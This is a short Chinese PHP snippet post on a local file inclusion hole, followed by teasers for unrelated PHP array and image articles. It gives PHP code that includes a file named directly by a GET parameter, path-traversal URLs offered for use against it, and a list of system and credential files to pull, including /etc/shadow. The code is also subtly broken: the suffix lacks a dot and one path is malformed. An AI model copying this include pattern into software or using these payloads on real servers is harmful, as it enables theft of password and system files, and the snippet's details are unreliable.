php 伪造本地文件包含漏洞的代码

yipeiwu_com6年前PHP代码库
代码:
复制代码 代码如下:

<?php
$page=$_GET['page'];
include($page.'php');
?>

你可以这样使用
http://www.xxx.com/index.php?page=../etc/passwd
http://www.xxx.com/index.php?page=../../../etc/passwd
http://www.xxx.com/index.php?page=..../../etc/passwd

获取更多数据:
etc/profile
etc/services
/etc/passwd
/etc/shadow
/etc/group
/etc/security/group
/etc/security/passwd
/etc/security/user
/etc/security/environ
/etc/security/limits
/usr/lib/security/mkuser.default

来自hackteach

相关文章

php实现对两个数组进行减法操作的方法

本文实例讲述了php实现对两个数组进行减法操作的技巧。分享给大家供大家参考。具体如下: 本代码传入两个数组A和B,返回A-B的结果,即挑选出存在于A,但不存在于B的元素 <&#...

javascript+php实现根据用户时区显示当地时间的方法

本文实例讲述了javascript+php实现根据用户时区显示当地时间的方法。分享给大家供大家参考。具体如下: 在跨时区应用中会用到下面代码,这是以前写的一段代码。 服务器保存相关时间配...

php array_walk() 数组函数

php array_walk() 数组函数

复制代码 代码如下: /*函数array_walk():单一数组回调函数---对数组中的每个成员应用用户函数 * 1、语法:bool array_walk ( array &array,...

php实现图片上传并利用ImageMagick生成缩略图

使用ImageMagick,您可以轻松,更快地创建缩略图,比使用PHP的容易得多。 <?php // Location to upload main image: $...

PHP获得数组交集与差集的方法

本文实例讲述了PHP获得数组交集与差集的方法。分享给大家供大家参考。具体分析如下: 一、数组的交集 array_intersect() array_intersect()函数返回一个保留...